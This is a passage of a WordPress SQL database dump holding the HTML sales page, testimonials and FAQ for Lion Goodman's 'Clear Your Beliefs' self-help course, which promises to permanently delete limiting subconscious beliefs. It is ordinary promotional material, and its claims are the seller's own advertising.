Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\n<div style="text-align: right;"></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n\n</div>\n<h1 class="center">Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\n\n&nbsp;\n<div class="s20"></div>\n<h1 id="faq">Frequently Asked Questions</h1>\n&nbsp;\n\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n&nbsp;\n\n<strong> Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n&nbsp;\n\n<strong> Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n&nbsp;\n\n<strong> Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n&nbsp;\n\n<strong> Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n&nbsp;\n\n<strong> Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'inherit', 'closed', 'open', '', '936-autosave-v1', '', '', '2014-06-17 17:07:17', '2014-06-17 22:07:17', '', 936, 'http://clearyourbeliefs.com/936-autosave-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(947, 4194, '2014-06-17 17:00:41', '2014-06-17 22:00:41', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you 